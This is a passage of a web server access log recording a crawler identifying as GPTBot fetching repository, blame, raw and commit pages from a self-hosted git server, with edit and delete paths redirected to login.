74.7.227.38] [Length 526179] [Gzip 19.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/xref-AssetPilot.html" -[17/Feb/2026:17:12:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/assets/js/i18n.js" -[17/Feb/2026:17:12:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/assets/js/i18n.js" -[17/Feb/2026:17:12:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/assets/js/i18n.js" -[17/Feb/2026:17:12:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/assets/js/i18n.js" -[17/Feb/2026:17:12:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" [Client 74.7.227.38] [Length 554560] [Gzip 19.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full" -[17/Feb/2026:17:12:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" [Client 74.7.227.38] [Length 554517] [Gzip 19.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full" -[17/Feb/2026:17:12:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" [Client 74.7.227.38] [Length 554561] [Gzip 19.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full" -[17/Feb/2026:17:12:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11010] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/Makefile" -[17/Feb/2026:17:12:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/watchdog_final.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final.py" -[17/Feb/2026:17:12:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/watchdog_final.py" -[17/Feb/2026:17:12:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:17:12:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:17:12:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:17:12:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:17:12:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/watchdog_final.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final.py" -[17/Feb/2026:17:12:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/watchdog_final.py" -[17/Feb/2026:17:12:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/watchdog_final.py" [Client 74.7.227.38] [Length 9859] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final.py" -[17/Feb/2026:17:12:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/watchdog_final.py" [Client 74.7.227.38] [Length 35308] [Gzip 14.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final.py" -[17/Feb/2026:17:12:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/watchdog_final.py" [Client 74.7.227.38] [Length 997] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final.py" -[17/Feb/2026:17:12:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" [Client 74.7.227.38] [Length 9928] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" -[17/Feb/2026:17:12:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" [Client 74.7.227.38] [Length 9896] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" -[17/Feb/2026:17:12:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" [Client 74.7.227.38] [Length 845947] [Gzip 27.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" -[17/Feb/2026:17:12:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" [Client 74.7.227.38] [Length 9926] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" -[17/Feb/2026:17:12:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" [Client 74.7.227.38] [Length 845918] [Gzip 27.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" -[17/Feb/2026:17:13:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" [Client 74.7.227.38] [Length 845949] [Gzip 27.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" -[17/Feb/2026:17:13:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 204277] [Gzip 14.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:17:13:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 1912] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:17:13:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10429] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:17:13:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/watchdog_final.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/watchdog_final.py" -[17/Feb/2026:17:13:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/watchdog_final.py" -[17/Feb/2026:17:13:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/watchdog_final.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/watchdog_final.py" -[17/Feb/2026:17:13:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/watchdog_final.py" -[17/Feb/2026:17:13:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 139339] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:17:13:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" [Client 74.7.227.38] [Length 958759] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" -[17/Feb/2026:17:13:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" [Client 74.7.227.38] [Length 958759] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" -[17/Feb/2026:17:13:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" [Client 74.7.227.38] [Length 958759] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" -[17/Feb/2026:17:13:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/vite.config.ts?display=rendered" [Client 74.7.227.38] [Length 10913] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/vite.config.ts" -[17/Feb/2026:17:13:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14745] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:17:13:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:17:13:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:17:13:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:17:13:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:17:13:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14743] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:17:13:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14744] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:17:13:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14745] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:17:13:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14750] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/Makefile2" -[17/Feb/2026:17:13:15 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/-" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" -[17/Feb/2026:17:13:15 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/-" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" -[17/Feb/2026:17:13:16 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/-" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" -[17/Feb/2026:17:13:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/main.py?display=source" [Client 74.7.227.38] [Length 19751] [Gzip 5.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/main.py" -[17/Feb/2026:17:13:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/main.py?display=rendered" [Client 74.7.227.38] [Length 10858] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/main.py" -[17/Feb/2026:17:13:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/main.py?display=rendered" [Client 74.7.227.38] [Length 10919] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 